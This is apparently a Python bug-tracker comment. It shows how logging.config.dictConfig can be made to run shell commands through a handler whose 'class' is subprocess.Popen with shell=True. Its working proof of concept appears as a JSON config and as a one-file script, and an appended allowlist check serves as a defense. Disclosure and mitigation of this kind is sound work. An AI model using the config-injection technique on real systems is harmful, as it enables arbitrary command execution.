MarkBaggett <[email protected]> added the comment:
Let me also mention that the problem really includes anything that uses the
resolve() functions. Here is a working example that puts an exploit in a
HANDLER rather than a FORMATTER.
$ ls /tmp/alsoworked
ls: cannot access '/tmp/alsoworked': No such file or directory
$ python calculator.py
$ ls /tmp/alsoworked
/tmp/alsoworked
$ cat log.config
{
    "version": 1,
    "root": {
        "handlers": ["EXPLOIT"]
    },
    "handlers": {
        "EXPLOIT": {
            "class": "subprocess.Popen",
            "args": "touch /tmp/alsoworked",
            "shell": "True"
        }
    }
}
Or if you prefer it in one file...
-----------------------------
import logging.config
import json

log_config_txt = '''{
    "version": 1,
    "root": {
        "handlers": ["EXPLOIT"]
    },
    "handlers": {
        "EXPLOIT": {
            "class": "subprocess.Popen",
            "args": "touch /tmp/alsoworks",
            "shell": "True"
        }
    }
}
'''
log_config = json.loads(log_config_txt)
# dictConfig resolves the handler's "class" string to a callable and calls it
# with the handler's remaining keys as keyword arguments.
logging.config.dictConfig(log_config)
------------------------
----------
_______________________________________
Python tracker <[email protected]>
<https://bugs.python.org/issue46251>
_______________________________________
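
A defensive pre-check for the behaviour reported in this message, as an added example that is not part of the original comment or of CPython: it walks a configuration dictionary and refuses to call `logging.config.dictConfig` when a `class`, `()` or `ext://` value is outside an allowlist. The names `ALLOWED_REFS`, `REPORTED_CONFIG`, `find_untrusted_refs` and `safe_dict_config`, and the allowlist contents, are assumptions of this example.

```python
import logging.config

# Assumed allowlist for this example: extend it with the handler, formatter
# and stream references your application really uses.
ALLOWED_REFS = frozenset({
    "logging.StreamHandler", "logging.FileHandler", "logging.NullHandler",
    "logging.handlers.RotatingFileHandler", "logging.Formatter",
    "ext://sys.stdout", "ext://sys.stderr",
})

# The handler definition from the message above, embedded as sample input.
REPORTED_CONFIG = {
    "version": 1,
    "root": {"handlers": ["EXPLOIT"]},
    "handlers": {"EXPLOIT": {"class": "subprocess.Popen",
                             "args": "touch /tmp/alsoworked",
                             "shell": "True"}},
}

def find_untrusted_refs(config, allowed=ALLOWED_REFS):
    """Return (path, value) pairs for references that are not allowlisted."""
    findings = []

    def walk(node, path):
        if isinstance(node, dict):
            for key, value in node.items():
                here = f"{path}.{key}" if path else str(key)
                if key in ("class", "()"):
                    # These keys name the callable that dictConfig resolves and calls.
                    if not (isinstance(value, str) and value in allowed):
                        findings.append((here, value))
                else:
                    walk(value, here)
        elif isinstance(node, (list, tuple)):
            for index, item in enumerate(node):
                walk(item, f"{path}[{index}]")
        elif isinstance(node, str) and node.startswith("ext://"):
            # ext:// strings are resolved to imported objects when dictConfig reads them.
            if node not in allowed:
                findings.append((path, node))

    walk(config, "")
    return findings

def safe_dict_config(config, allowed=ALLOWED_REFS):
    """Call logging.config.dictConfig only when every reference is allowlisted."""
    findings = find_untrusted_refs(config, allowed)
    if findings:
        raise ValueError(f"untrusted references in logging config: {findings}")
    logging.config.dictConfig(config)
```

The check only narrows which callables a configuration may name; a configuration loaded from a location that untrusted users can write to still needs file-permission and integrity controls.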